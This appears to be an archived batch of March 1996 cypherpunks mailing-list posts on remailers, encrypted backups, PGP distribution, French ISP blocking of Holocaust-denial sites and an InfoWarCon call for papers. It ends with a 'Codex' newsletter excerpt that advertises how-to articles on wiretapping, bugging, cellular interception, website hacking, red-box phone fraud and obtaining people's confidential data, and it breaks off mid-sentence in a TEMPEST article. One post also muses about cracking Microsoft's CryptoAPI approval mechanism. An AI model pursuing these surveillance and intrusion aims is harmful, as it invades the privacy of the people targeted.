-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUyb5e2vJ3dNshwFAQHN5wP7BN74aW2XhJnzfPnPyZUkg9N6asp+hCeN
Mw6B6Q7iPd3le0nd8wDLJI6zj9lJ0oOP8ViwI0tDLYbG/H3dpQrA8cgUlOioVaAF
L1ZruRvKn87gE0ZJHjIsnEeszxO+wAvnzPYPB2yTRM3LzQ1oIadjhj8FXnNxoVPN
hZ+RJSF+qpI=
=jEww
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sun, 17 Mar 1996 20:56:33 +0800
To: cypherpunks@toad.com
Subject: Re: PolicyMaker paper available
Message-ID: <v01530501ad71b65d49a6@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:12 PM 3/16/96, ECafe Anonymous Remailer wrote:
>Mab@Research.Att.Com posted:
>>A number of people have been asking me about some work I've been doing
>>
>>A PostScript pre-print is available in
    ^^^^^^^^^^

>>     ftp://research.att.com/dist/mab/policymaker.ps
>
>I D/Led this file last night & printed it out. I was a little suspicious
>at first because you'd think if AT&T really wanted people to read (instead
>of just wanting to say they published it) they'd put it on the web in http
>and not use obscure printer codes.
             ^^^^^^^^^^^^^^^^^^^^^

Yeah, not only that, but you need one of them fancy modem contraptions to
get it.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 18 Mar 1996 01:56:45 +0800
To: cypherpunks@toad.com
Subject: Re: InfoWarCon V 1996: Call For Papers
Message-ID: <m0tyMAw-0008zjC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 AM 3/17/96 -0500, winn@Infowar.Com wrote:
>PLEASE!
>It sounds fascinating. Submit.

I will NOT SUBMIT!   NEVER!   Oh, you meant my essay?  Sorry!  Here it is, parts 1-6.  Parts 7-8, and 9-10 in the next message:

Assassination Politics
by Jim Bell, jimbell@pacifier.com

Part 1

[rest deleted for CP]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Sun, 17 Mar 1996 23:17:11 +0800
To: Black Unicorn <jimbell@pacifier.com>
Subject: Re: InfoWarCon V 1996: Call For Papers
In-Reply-To: <Pine.SUN.3.91.960317032827.11248A-100000@polaris.mindport.net>
Message-ID: <199603171507.KAA02986@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


Welcome!

I can't tell which of the two authors of ths following conversation is the more 
paranoid, but clearly at least 1 1/2 of them are totally wrong with their 
assumptions about 'agenda' and 'receptiveness' and 'one-upped.' It's so obscure, 
I don't know whether to take it seriously or not.

BUT - if you are serious about submitting, to an international audience, I 
suggest that you first:

	- Read "Information Warfare: Chaos on the Electronic Superhighway"
	- Get the Proceedings from InfoWarCon III, 1995 from 1.800.488.4595

and then make informed opinions and decisions.

We openly ebncourgae and welcome controversial subjects; that's why InfoWarCon's 
are so successful Fromthe sounds of it, no one else would have you.   <BG>

Make it intersting, cogent, contributory to the field, and meaningful. We will 
then take you seriously.

Thyanks for your thoughts!
Winn



On Sun, 17 Mar 1996, Black Unicorn <unicorn@schloss.li> wrote:
>On Sat, 16 Mar 1996, jim bell wrote:
>
>> At 11:01 PM 3/16/96 -0500, winn@Infowar.Com wrote:
>> >                   C A L L   F O R   P A P E R S 
>> >
>> >                          InfoWarCon 5, 1996
>> >           Fifth International Information Warfare Conference
>> >            "Dominating the Battlefields of Business and War"
>> >                         September 5-6, 1996
>> >                           Washington, DC
>> 
>> I'm wondering if I should bother re-writing my "Assassination Politics" 
>> essay into the form of a paper and submitting it to these people.  While it 
>> might nominally be considered right down their alley, from a subject 
>> standpoint, even a cursory look at the location (Washington, DC) and the 
>> invited people (large companies and military) suggest that my ideas would be 
>> just about as welcome as a yarmulke at a Nazi Party convention.
>
>It didn't take an analysis of the sponsor or even the forum to determine 
>this.
>
>> 
>> I'm not aware of the agenda (hidden or otherwise) of the sponsors, so 
>I don't know whether I should even bother.  Many people aren't 
>particularly appreciative of being "one-upped" (not to mention made 
>obsolete) so it's not clear that they'd give me the time of day. Any 
>ideas as to their receptiveness?
>
>I think you should keep your day job.  As to "one-upping" the key figures 
>in the field.  Good luck.
>
>Hey, you asked.
>
>> Jim Bell
>> jimbell@pacifier.com
>> 
>> 
>
>---
>My prefered and soon to be permanent e-mail address: unicorn@schloss.li
>"In fact, had Bancroft not existed,       potestas scientiae in usu est
>Franklin might have had to invent him."    in nihilum nil posse reverti
>00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
>
>
>
Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 18 Mar 1996 02:17:20 +0800
To: telstar@wired.com
Subject: FYI - Article in Sun. 3/18 LI Newsday
Message-ID: <199603171814.NAA29008@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


There's an article in Sunday's (March 18) Long Island Newsday called
"When is online out of line" with the subtitle "Should we censor 
the internet?".

Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 18 Mar 1996 04:03:52 +0800
To: cypherpunks@toad.com
Subject: Win95 Remailer
Message-ID: <2.2.32.19960317073711.00676ff8@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I neglected to mention in my previous message that the source will also come with an executable.

Dave
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUukpsVrTvyYOzAZAQF7bQP+NtuSDNKUnNk3P7l11rnHCmouZrclhbT3
o2ayOhYiOnpAkV4UQJLm/SN4KT5OL9tZdy8uc5dI+jzywVkPUlP79HSbfj9SNvgF
AcjaDWvwjB4b0+iNam+avl/uMSR4xGRmCKi42pJZIN0klEvAvT6OadBYsPFat19W
1RiwthHvN9Y=
=yLK+
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mch@squirrel.com (Mark C. Henderson)
Date: Mon, 18 Mar 1996 06:43:09 +0800
To: cypherpunks@toad.com
Subject: Re: Backup of Encrypted Partition
Message-ID: <199603172221.OAA14725@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 17, 18:38, Sanwar Ali wrote:
} Subject: Backup of Encrypted Partition
} Hi
} 
} Apologies if this is too much of a beginner's Q.
} 
} Does anyone know how to backup a "SecureDrive" partition onto tape 
} quickly and easily.
} 
} HPACK is really slow.
} 
} PKZIP and then PGP is slow.
} 
} RAWDISK, seems to be quite complex (perhaps I am just stupid!), and I 
} am terrified of making some sort of terrible mistake.
} 
} I have about 100MB in the partition.  I have a pretty out of date 
} computer which is a 386 33MHz running Windows.


Ease of backup is one of the strengths of CFS which is a cryptographic
filesystem for various flavours of UNIX and Linux.

With CFS the encrypted files live in the ordinary UNIX filesystem 
(their names are also encrypted), so one can backup encrypted data 
without decrypting to make things intelligible and then encrypting to 
secure the tape. Backups take no more time than backups of ordinary 
unencrypted files and don't require any special tools (ufsdump, GNU 
tar, GNU cpio work fine). You backup files individually, which means 
you can also restore them individually, i.e. without restoring a 
whole partition. 

Of course, this doesn't solve your problem, because you are running 
Windows. But CFS might be incentive to also run a more feature-rich
operating system on your PC. You don't need to give up DOS/Windows
to also run Linux, FreeBSD, Solaris, Unixware, etc. 


-- 
Mark Henderson -- markh@wimsey.bc.ca, mch@squirrel.com, henderso@netcom.com
ViaCrypt PGP Key Fingerprint: 21 F6 AF 2B 6A 8A 0B E1  A1 2A 2A 06 4A D5 92 46
unstrip for Solaris, Wimsey crypto archive, TECO, computer security links,
change-sun-hostid, Sun NVRAM/hostid FAQ - http://www.squirrel.com/squirrel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 18 Mar 1996 06:48:59 +0800
To: cypherpunks@toad.com
Subject: Re: Judge blocks French ISPs from connecting to revisionist sites
In-Reply-To: <clH7GPi00YUuAJS3lr@andrew.cmu.edu>
Message-ID: <Pine.ULT.3.91.960317133232.4282A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Those silly French people. And this right after the German Minister of
Justice is quoted in Der Spiegel admitting that such blocking is foolish
and counterproductive. 

OTOH, the Attorney General of Ontario threw out all charges against Ernst
Zundel last Friday. Zundel's Holocaust-denial files are available from
pathcom.com, cts.com, aol.com, compuserve.com, netcom.com, c2.org,
stormfront.org, mit.edu, and cmu.edu (most of the Zundel-friendly sites
require payment and a password). A student at pitt.edu has publicly and
repeatedly offered to mirror Zundel's files as well, but he won't let her,
because she's Jewish. None of the mirror sites are blocked by the French
action, and of course all email and anonymous proxy routes are unfettered. 

Declan's list of links tells only one side of the story, with numerous
factual errors that have been pointed out publicly and repeatedly. I 
refer you to last months' posts to comp.org.eff.talk by rich@c2.org.

See also articles in the Western Jewish Bulletin by Hilary Ostrov and
others, which support the right of Holocaust-deniers to speak freely.
Those articles are available at: 

 http://haven.uniserve.com/~hostrov/jwb/
 http://haven.uniserve.com/~hostrov/mcvay.html
 http://haven.uniserve.com/~hostrov/denial.html

There are dozens of articles, many of them by Holocaust survivors and the
children of survivors and victims supporting the right of
Holocaust-deniers to lie and organize freely on shamash.nysernet.org,
www.eff.org, nizkor.almanac.bc.ca, and www.skeptic.com. The articles on
the Skeptic Society and EFF sites have some interesting comments on the
"Revisionists'" callous disregard for the truth in both substantive and
"anti-censorship"  matters. See: 

 http://www.almanac.bc.ca/cgi-bin/ftp.pl?orgs/american/skeptic.magazine

You will find not one article supporting the censorship of Nazis in
alt.revisionism or alt.fan.ernst-zundel. For over a year, the regular
posters have been trying to get the "Revisionist" leaders to participate
in a public discussion on Usenet, but they have refused.

Mendacious secret societies are secret not because they are oppressed, 
but because whenever they show their face in public, they are laughed at. 

 http://www.users.cts.com/crash/m/metzger/White_Aryan_Resistance_Info/Race_%26_Reason.html

- -rich
 Institute for Revisionist Revisionism
 http://www.c2.org/~rich/Press/Swedish/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUyQ8Y3DXUbM57SdAQGaHAP/Q3LvW0XFnYl53xLcqmfLsbFbAmuFm7aM
5XTp3vGlVWyt2oRZpk2aP+emN70+kRaxcETDi8d9qIFZrsW+U9pbMajE7828VBB9
Muh5cS+1N0HoUnvTDx5Qu6fOXp+bhz+7zIGokCbgSlcf32fEqEv3yaJY7NzUGRrA
ezgFaCK+DrM=
=26m3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Mon, 18 Mar 1996 05:49:55 +0800
To: cypherpunks@toad.com
Subject: Censorship
Message-ID: <199603172135.OAA20358@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain



FYI, just saw the following scheduled (at least here in Tucson) on PBS for
Friday night, 3/23:

_Firing Line_ debate
Resolved: The Government Has the Right to Regulate the Internet
"A current communications controversy fuels the proposed resolution in the
latest installment of William F. Buckley Jr.'s recurring series, in which
participants debate whether the Internet should be federally regulated.
Among those arguing for it with Buckley are Arianna Huffington and Reid
Hoffman; those against it include Susan Estrich and John Perry Barlow."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 18 Mar 1996 04:46:14 +0800
To: cypherpunks@toad.com
Subject: Judge blocks French ISPs from connecting to revisionist sites
Message-ID: <clH7GPi00YUuAJS3lr@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From the attached message by Valerie Sedallian, it looks like a French
judge approved the injunction. This will allow the French Jewish Students
Association to prevent a number of ISPs (including CompuServe and IBM
Global Network) from allowing connections to any revisionist web sites. In
France, revisionism is a criminal offense. 

Related messages are in these archived threads:

http://fight-censorship.dementia.org/fight-censorship/dl?num=1801
http://fight-censorship.dementia.org/fight-censorship/dl?thread=French+Jewish+s
tudents+sue+ISPs+for+revisionist+materials&after=1817

Instructions on how to subscribe to fight-censorship-announce for updates:
  http://fight-censorship.dementia.org/top/

A web site with some info on Germany's failed net.blocking attempts:
  http://www.gsia.cmu.edu/andrew/ml3e/www/Not_By_Me_Not_My_Views/

France's failed book banning attempt is at:
  http://www.cs.cmu.edu/~declan/le-secret/

Info on other international net-censorship attempts is at:
  http://www.cs.cmu.edu/~declan/zambia/

-Declan



---------- Forwarded message ----------
Date: Sun, 17 Mar 1996 20:29:05 +0100
From: Sedallian =?iso-8859-1?Q?Val=E9rie?= <sedallian@argia.fr>
To: Declan McCullagh <declan@eff.org>
Subject: French Jewish students sue ISPs for revisionist materials?

Declan,

Here is a note about the hearing that i have written for my newsletter and
translated . english version has not reviewed yet so please excuse english
mistakes.you can forward this message .

FRANCE : 15 March 1996

A French Jewish Students Association ( Union des Etudiants Juifs de France
- UEJF)  has issued a writ against 9 French Internet Providers on the
grounds that ISP allow their client to access to negationists services or
messages infringing French criminal law.
 The plaintiff asked that the jugde gave the defendants an injonction under
penalties to prevent their clients to connect to messages and services
that patently infringe a  french law that provides that revisionism is a
criminal offense (loi Gayssot).

 The law provides that whose who will have contested publicly the existence
of one or some crimes
against humanity as they are defined under article 6 of statutes   of the
international military court attached to London agreement of 8 august 1945
and that have been committed either by an organisation declared criminal by
application of article 9 of the said statute , or by a person recognised as
guilty of such crimes by a french or international jurisdiction will be
punished up to an emprisonnment of one year or/and a fine of 300 000FF

Defendants have explained that they were providers of access, not of
content, the the plaintiff 's demand would amount to make an a priori,
systematic, in real time control  on all serviecs and messages exchanged,
which would be impossible to implement. They underlined the discriminatory
character of the proceedings as not all French IP had been sued and the
unspecified nature of the demand , messages and services considered
unlawfull not being precised.
International law issues and the fact that negationnists messages come from
persons located in the USA where they are protected by the 1st amendment of
the american constitution have also been discussed.

Internet providers have reminded that they were neither administrators or
managers of the Internet, which is  a network build by  users themselves.

 Sentenced is scheduled April 12th 1996.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 18 Mar 1996 06:22:26 +0800
To: cypherpunks@toad.com
Subject: RemailerBot available from homepage
Message-ID: <2.2.32.19960317100524.0069ec4c@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've gotten RemailerBot up on my home page. Source, executable, and (very sparse) documentation available as a 20+K zip file.

http://www.shellback.com/personal/merriman/index.htm

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUvHksVrTvyYOzAZAQG5ywQAoYhjUDZ3Hexc8HoFW7C3zKkrFnXyx5nd
iGAYQy9BcKh25fTz8pFmezEKPnAH2v58+OY/5I86F9ZgKDTpLiRXn/TrG97X3cGh
DxVgrgar+yDsdhJ9RKlT6s7PmDf6H8f2nvblRBDqKbcc1Mj57l9RNNH3/fBjGlXg
SPvIwfr/SaY=
=+9G4
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 18 Mar 1996 08:51:01 +0800
To: cypherpunks@toad.com
Subject: Re: Judge blocks French ISPs from connecting to revisionist sites
In-Reply-To: <Pine.ULT.3.91.960317133232.4282A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.ULT.3.91.960317144453.4282B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In other news, Holocaust Revisionist mgiwer@combase.com (Matt Giwer) has
been *openly bragging* about getting a political opponent kicked off of a
conservative Texas ISP. The main difference between the French and Texas
cases being that the information on Rack Jite's web pages was true, and
the information on the Holocaust Revisionist sites is not. I guess that's
not important, though, since by definition, Political Correctness only
targets the right. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 18 Mar 1996 06:01:00 +0800
To: Sanwar Ali <sanwar@bclimser.demon.co.uk>
Subject: Re: Backup of Encrypted Partition
In-Reply-To: <827090597.2529.0@bclimser.demon.co.uk>
Message-ID: <Pine.LNX.3.91.960317163940.615A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 17 Mar 1996, Sanwar Ali wrote:

> Does anyone know how to backup a "SecureDrive" partition onto tape
> quickly and easily.
>
> HPACK is really slow.
>
> PKZIP and then PGP is slow.
>
> RAWDISK, seems to be quite complex (perhaps I am just stupid!), and I
> am terrified of making some sort of terrible mistake.

I don't think that you can avoid the speed problem.  The SecureDrive TSR
has to decrypt the data on the disk and this can be a slow procedure when
dealing with 100 megabytes.  You could speed up the backup procedure by
turning off compression.  I know that pkzip has this option, but I'm not
sure about any of the other programs you mention.

- --Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMUyIGbZc+sv5siulAQGUSwP/TveptXcLvr/J8Ehxzi/NhcY02omdM9WF
kbOMSqPKkGfPDUNmCnCQWoOsSMhjOWH5dqpW3+QC59+R1YQDRILGdPMttfpvuXDB
UCRmP9BkYsG/knhrfnztw0eoUKV3TgMLGMC1tETGJ1PG4tWcaFj70wYDnffo5ckI
vHpP1ggyJc8=
=ECX1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 18 Mar 1996 08:11:07 +0800
To: cypherpunks@toad.com
Subject: Re: M$ CryptoAPI Question
In-Reply-To: <314bb878.2839245@kaiwan.kaiwan.com>
Message-ID: <5ckykD30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


bglassle@kaiwan.com (Bob Glassley) writes:
> With the current releases of the NT 4.0 betas, I would assume some of
> you have had the chance to look at the API more closely.  I am getting
> ready to hack my first crypto enabled app and wondered if this was
> worth using or if Crypto C++ is the way to go.
>
> I would think that if their implementation is solid, and some of the
> *real* crypto gods write stronger CSP's than the M$ RSA Base CSP, this
> would be a good approach to get more enabled apps accepted for regular
> usage.

I wonder if it's worth it to crack their approval mechanism so we can
add our own crypto subsystems without asking Microsoft's approval.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sanwar Ali <sanwar@bclimser.demon.co.uk>
Date: Mon, 18 Mar 1996 08:43:33 +0800
To: cypherpunks@toad.com
Subject: Backup of Encrypted Partition
Message-ID: <827090597.2529.0@bclimser.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hi

Apologies if this is too much of a beginner's Q.

Does anyone know how to backup a "SecureDrive" partition onto tape 
quickly and easily.

HPACK is really slow.

PKZIP and then PGP is slow.

RAWDISK, seems to be quite complex (perhaps I am just stupid!), and I 
am terrified of making some sort of terrible mistake.

I have about 100MB in the partition.  I have a pretty out of date 
computer which is a 386 33MHz running Windows.

Any ideas and all the best.
--
Sanwar Ali

Managing Partner
BCL Immigration Services
40 South Audley Street
Mayfair
London, W1Y 5DH
UK

Telephone: +44 171 495 3999 or +44 171 495 8662
Fax: +44 171 495 3991
e-mail: sanwar@bclimser.demon.co.uk, sanwar@pobox.com
For public key: finger sanwar@pobox.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Mon, 18 Mar 1996 08:12:13 +0800
To: cypherpunks@toad.com
Subject: MIT PGP Distribution Site Upgraded
Message-ID: <9603172338.AA24444@big-screw>
MIME-Version: 1.0
Content-Type: text/plain


(A copy of this message has also been posted to the following newsgroups:
sci.crypt, alt.security.pgp)

-----BEGIN PGP SIGNED MESSAGE-----

New Software being used to distribute PGP via the World Wide Web from
MIT.

Since last night (Saturday) we have been running new Web Server software
at http://web.mit.edu/network/pgp.html (the MIT PGP Homepage). This
software is specially coded to deal with the complications of running an
export controlled Web distribution site. The primary visible (to you)
feature of this new software is that the bureaucracy necessary to get
into the distribution site has been automated. When our old software
believed your host was not in the U.S. or Canada because it was unable
to "reverse resolve" your host's name you were out of luck. With this
new software you will be given a chance to enter your e-mail address. We
will then verify your e-mail address in real time and send you a special
password which will allow you access to the distribution site, even if
we couldn't let you in previously (this whole process happens
automatically and doesn't wait for me to manually do anything!!!).

IF YOU PREVIOUSLY SENT ME MAIL ASKING THAT I ADD YOUR SITE (particularly
if I haven't responded, which is likely given the large number of
requests I receive a day) YOU SHOULD TRY OUR WEB SITE NOW.

Note: This software is still a little green and may be down from time to
time while I install new versions (or if it crashes hard while I am
sleeping or in meetings). There are known problems mostly dealing with
older browsers which do "interesting" things. If you cannot get past the
PGP access form page, keep trying (after a day or so). I will be
monitoring the debugging logs and fixing things as I notice problems.
AOL users cannot yet get through (I am working on this tonight, but I
don't know if I'll figure out what is going on before I have to call it
a night).

Please do *not* send me e-mail yet reporting problems (the debugging
logs will tell me a lot) unless you believe the problem you are seeing
is particularly "interesting." Once the code is more stable I will send
another message indicating that I think things are stable, *then* you
can complain to me when things don't work because I will be removing the
debugging code after it is stable.

Also Note: We are only using this new software for PGP at the moment
*NOT* PGPfone. However our plan is to convert the PGPfone distribution
site to this new software as well.

Btw. Phil informs me that the next PGPfone beta test, for both the
Macintosh and (finally) Windows '95 should be ready any day. Some of you
have heard this story before... but maybe this time...

When this next release of PGPfone is made available, the new
distribution system will be in effect.

Technical details (for those who care, the rest of you can skip this):

The new distribution system is a stand alone program which you talk to
after "posting" the PGP access form. This program is a complete Web
server in and of itself. It runs in one process, multiplexing up to 50
connections simultaneously (this makes it fast because it doesn't have
to fork processes, something UNIX isn't particularly good about). It is
written in C++ (compiled under G++) and is currently hosted on a SGI
Indy workstations (175Mhz processor with 100 Megabytes of RAM), though
it may move to a different server soon.

And yes, I will be making it publicly available after I have it better
debugged.

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUyiJMUtR20Nv5BtAQGPrAQAq2z7Nz3/XlWqjcRwSq8aFRiiqLI04oEp
w1T9OZk3Ie7cTgfebyA69yGLNXPo4oFfea9Y6fw56eOMP2F/+gaCEajXhCwrMIjQ
zSp8jF0QzTihZv0QYod2t4wIlOw7jNiAUIRdIBELI2OS12J0TRwOxb4eogHvI6Jh
Q08S107/X1c=
=GaW0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SpyKing <spyking@mne.net>
Date: Mon, 18 Mar 1996 08:52:34 +0800
To: (Recipient list suppressed)
Subject: Sample Codex Newsletter
Message-ID: <9603172340.AA02237@mne.com>
MIME-Version: 1.0
Content-Type: text/plain


The Codex  Surveillance & Privacy Newsletter - Sample Issue Excerpts
Published monthly - 
Subscription Rate $95.00
Foreign Subscriptions: $135.00
The Codex is a hardcopy newsletter delivered by first class US mail.
Send Check or MO to:
Codex Publishing
286 Spring Street
New York, NY 10013
Tel: 212-989-9898
Fax: 212-337-0934

Every day we see or hear in the news, stories about electronic surveillance,
wiretapping, corporate espionage, computer hacking, etc. Ever wonder how
it's done? The Codex is a monthly newsletter published by Codex Publishing
of New York City. It was created by professionals in the field of electronic
surveillance, countermeasures, security, investigations and competitor
intelligence and will teach you all the inside "Tricks of the Trade".

Prior issues of the Codex have featured articles on:

How to TAP a telephone...How to BUG a room...How to intercept a CELLULAR
telephone conversation...
How to intercept a digital PAGER...How to HACK a web site...How to DECODE
telephone numbers off a tape recording...How to LISTEN into your home or
office when you're away on vacation...How to SEE into your home or office
when you're away on business...How to build a RED BOX for free phone
calls...How to DETECT an eavesdropping device planted in your home or
office...How to ACQUIRE personal & confidential information on anyone...

Future issues of the Codex will feature "How To" articles on:

Spying, Industrial Espionage, Competitor Intelligence, Emerging
Technologies, Privacy and How to get it, Computer Hacking, Telephone
Phreaking, Cons & Schemes, Insider tips on the Internet, Self Defense, Big
Brother, Encryption, Surveillance Devices, Privacy Equipment, Intelligence
Gathering Equipment and Sources of Confidential Information

One time reprint and excerpt rights automatically granted provided our name
and address is given. Enclosed is an abbreviated sample.

LETTER FROM THE EDITOR

Happy New Year to everyone and we sincerely hope 1996 brings you all good
fortune and everything you hope for. Be careful, you just might get it...

In response to the overwhelming requests for advertising rates and
information we have decided to accept limited advertising in 1996 and will
begin to accept advertising immediately.

Advertising will be limited to a full page at the nominal rate of $150.00
per issue with volume discounts of course.

We will travel shortly to New Zealand to attend 'The Gathering Conference"
on information and communications security and will report our findings in
great detail in an upcoming issue of the Codex. "The Gathering" promises to
be an exciting and information bonanza with several of the top people in the
world attending and speaking on a variety of subjects of interest to us all.
We urge you to adise us if you have a security, computer or communications
function planned, as we will make every attempt to give the event coverage.
If we don't know about it...there's not much we can report.

We've got a wealth of info for you this month with a very interesting topic
on Web Site hacking. Seems the old rule applies, "Anything man can invent,
man can defeat." How long before this window is closed?

Don't forget. ..If there is a topic you would like to see covered, please
let us know and we'll do everything we can to get it done for you.

Enjoy this issue...we had fun doing it.

SpyKing

****************************************************************************
******
****************************************************************************
******

Nowhere to run...Nowhere to hide...
The vulnerability of CRT's, CPU's and peripherals to TEMPEST monitoring in
the real world.

Copyright 1996, All Rights Reserved


By Frank Jones
CEO
Technical Assistance Group
286 Spring Street
New York, New York 10013 USA
Tel: 212-989-9898
Fax: 212-337-0934
E-Mail: spyking@thecodex.com
URL: http://www.thecodex.com


George Orwell wrote the classic "1984"  in 1949. He depicted a world in
which the government controlled it's citizens and a world devoid of privacy.
Many of the things Orwell wrote almost fifty years ago have come to pass.

Surveillance technology has progressed to the point that is possible to
identify individuals walking city streets from satellites in orbit.
Telephone, fax and e-mail communications can routinely be monitored.
Personal information files are kept on citizens from cradle to grave. There
is nowhere to run...nowhere to hide...

The advent of the personal computer has revolutionized the way we do
business, keep records, communicate and entertain ourselves. Computers have
taken the place of typewriters, telephones, fax and telex machines.

The Internet has opened up a new world of high speed and inexpensive
communications. How secure and private is it? There are many encryption
programs and hardware devices available for security purposes but what about
the computer terminal itself? How safe is it? What are it's vulnerabilities?
Hackers have been known to cause mischief from time to time...Is it possible
for an adversary to snoop on your private data? Can Big Brother?

Suppose it was possible to aim a device or an antenna at your apartment or
home from across the street or down the block. Suppose you were working on a
confidential business project on your PC. Suppose that device down the block
could read what you were typing and viewing on the CRT? Feeling
uncomfortable? Suppose that device could monitor everything you do on your
computer by collecting electromagnetic radiation emitted from your
computer's CRT, CPU and/or peripheral equipment, reconstruct those emissions
into coherent receivable signals and store them for later review? Feeling
faint? Good. The technology exists...and it has for some time....

You don't have to worry about a  "middle of the night" break-in by some
clandestine government black-bag team to plant a bug.  They never have to
enter your home or office. Seedy looking private investigators or the
information warrior won't be found tampering with your telephone lines in
the basement either...it's not necessary...all they have to do is point an
antenna...safely, from a distance away...and collect your private data...

This surveillance technique has become known as TEMPEST monitoring. TEMPEST
stands for Transient  Electromagnetic Pulse Standard. It is the standard by
which the government measures electromagnetic computer emissions and details
what is safe (allowed to leak) from monitoring. The standards are detailed
in NACSIM 5100A, a document which has been classified by the National
Security Agency. Devices which conform to this standard are called TEMPEST
certified.

In 1985, a Dutch scientist Wim van Eck published a paper which was written
about in the prestigious "Computers & Security" journal, "Electromagnetic
Radiation from Video Display Units: An Eavesdropping Risk?" Vol 4 (4) pp
269-286. The paper caused a panic in certain government circles and was
immediately classified as is just about all TEMPEST information. 

Wim van Eck's work proved that Video Display Units (CRT's) emitted
electromagnetic radiation similar to radio waves and that they could be
intercepted, reconstructed and viewed from a remote location. This of course
compromises security of data being worked on and viewed by the computer's
user. Over the years TEMPEST monitoring has also been called van Eck
monitoring or van Eck eavesdropping.

In 1990, Professor Erhard Moller of Acchen University in Germany published a
paper, "Protective Measures Against Compromising Electromagnetic Radiation
Emitted by Video Display Terminals". Moller's paper which updated in detail
van Ecks's work also caused a furor.

The government's policy of TEMPEST secrecy has created a double edged sword.
By classifying TEMPEST standards, they inhibit private citizens and industry
by failing to provide the means of adequately shielding PC's and/or computer
facilities. There is an old saying, "You can't drive a nail without the
hammer". If concerned personnel don't know the minimum standards for
protection...how can they shield and protect? Shielding does exist which can
prevent individuals and companies from being victims to TEMPEST monitoring.
But without knowing the amount of shielding necessary...

Perhaps this is the way the government wants it... 
My work has focused on constructing a countermeasures device to collect and
